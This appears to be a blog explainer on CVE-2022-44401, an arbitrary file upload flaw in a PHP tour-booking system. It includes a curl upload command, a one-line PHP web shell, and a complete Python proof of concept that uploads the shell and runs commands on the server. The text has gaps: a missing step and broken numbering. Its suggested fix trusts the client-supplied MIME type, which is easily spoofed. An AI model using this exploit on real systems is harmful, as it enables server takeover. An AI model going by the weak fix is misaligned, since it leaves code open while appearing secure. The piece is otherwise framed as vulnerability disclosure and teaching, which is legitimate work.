The world of travel is rapidly becoming digital, and with more people booking tours online, keeping software secure is more important than ever. But sometimes, even popular solutions like Online Tours & Travels Management System aren’t as safe as they seem. In late 2022, a critical security bug surfaced in this system—CVE-2022-44401. This vulnerability allows attackers to upload ANY file they want, which can lead to your server being completely taken over.
This article will explain this vulnerability in simple English, show you working code snippets, give you links for further reading, and break down how hackers could exploit it. If you run or develop for Online Tours & Travels Management System v1., you need to pay attention.
What is CVE-2022-44401?
CVE-2022-44401 is an arbitrary file upload vulnerability found in the Online Tours & Travels Management System v1., specifically in the /tour/admin/file.php endpoint.
In simple terms: An attacker can send a crafted request and upload any file (including dangerous scripts), with no checks stopping them.
This kind of vulnerability usually leads to remote code execution (RCE), which means a hacker can run dangerous commands on your server.
Where Is the Vulnerability?
The problem exists in the file handling code in /tour/admin/file.php. This PHP script lets users upload files but does not properly check the file type or contents.
Here’s a very simplified (but realistic) look at what the code might resemble inside file.php
<?php
$target_dir = "uploads/";
$target_file = $target_dir . basename($_FILES["file"]["name"]);
// No file extension or MIME type check!
if (move_uploaded_file($_FILES["file"]["tmp_name"], $target_file)) {
echo "The file ". htmlspecialchars(basename($_FILES["file"]["name"])). " has been uploaded.";
} else {
echo "Sorry, there was an error uploading your file.";
}
?>
Notice: There’s no check on the file type or contents.
Upload the Malicious File:
- The attacker uploads this through /tour/admin/file.php as if they were uploading a normal file, using a tool like curl:
`bash
curl -F "file=@shell.php" http://target-site/tour/admin/file.php
`
http://target-site/tour/admin/uploads/shell.php?cmd=whoami
If an attacker succeeds
- They can run ANY command (like deleting the database, defacing the website, or stealing sensitive information).
Here’s a step-by-step PoC in Python using requests
import requests
# Target file upload endpoint
url = 'http://target-site/tour/admin/file.php'
# Path where uploaded files go (based on code, e.g., /uploads/)
uploaded_url = 'http://target-site/tour/admin/uploads/shell.php';
# 1. Prepare the malicious payload
files = {'file': ('shell.php', '<?php system($_GET["cmd"]); ?>', 'application/x-php')}
# 2. Upload the shell
response = requests.post(url, files=files)
print(response.text)
# 3. Trigger a command
cmd_response = requests.get(uploaded_url, params={'cmd':'id'})
print(cmd_response.text)
Official Reference Links
- CVE Details for CVE-2022-44401
- Exploit Proof (Exploit-DB)
Apply File Type Checks: Only allow uploads with safe extensions (e.g., .jpg, .png).
2. Check MIME Types: Ensure MIME-type is image/* when uploading images.
Rename Files: Give uploaded files random names and do NOT allow direct execution.
4. Move Uploads Outside Web Root: Prevent direct access/execution of uploads.
Example: Safe File Upload Logic
$allowed_types = ['image/jpeg', 'image/png'];
if (in_array($_FILES['file']['type'], $allowed_types)) {
// proceed with move_uploaded_file
} else {
echo "Invalid file type.";
}
Conclusion
CVE-2022-44401 is a high-severity bug in Online Tours & Travels Management System v1. that puts any website running it at serious risk. Arbitrary file upload is a classic but deadly PHP mistake. If you’re using or developing on this platform: patch your system, audit your code, and ALWAYS sanitize file uploads.
If you found this helpful or need technical advice, stay tuned—or reach out!
Timeline
Published on: 11/28/2022 15:15:00 UTC
Last modified on: 11/28/2022 19:15:00 UTC